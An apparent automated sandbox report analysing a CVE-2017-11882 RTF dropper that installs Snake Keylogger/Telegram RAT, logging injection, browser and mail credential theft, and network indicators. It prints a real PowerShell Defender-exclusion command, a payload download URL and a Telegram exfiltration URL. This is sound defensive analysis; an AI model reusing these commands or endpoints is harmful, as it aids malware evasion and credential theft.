Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 5EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 6EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 6FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 7FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 2B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Memory allocated: 350000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3068	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3976	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Window / User API: threadDelayed 9697	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3324	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep count: 3068 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660	Thread sleep count: 3976 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3700	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764	Thread sleep time: -3000000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768	Thread sleep count: 9697 > 30	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3804	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: cmnjgwhesilo61000.exe, 00000005.00000002.406677498.0000000000454000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: hgFstpgF.WxgF.W

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Memory written: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	14 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	24 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
na.doc	34%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
na.doc	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe	true		unknown
https://reallyfreegeoip.org/xml/173.254.250.78	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/server1.crl0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.784	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.diginotar.nl/cps/pkioverheid0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://87.120.84.38/txt/pKL9HXcZosWfPt1.exej	EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false		unknown
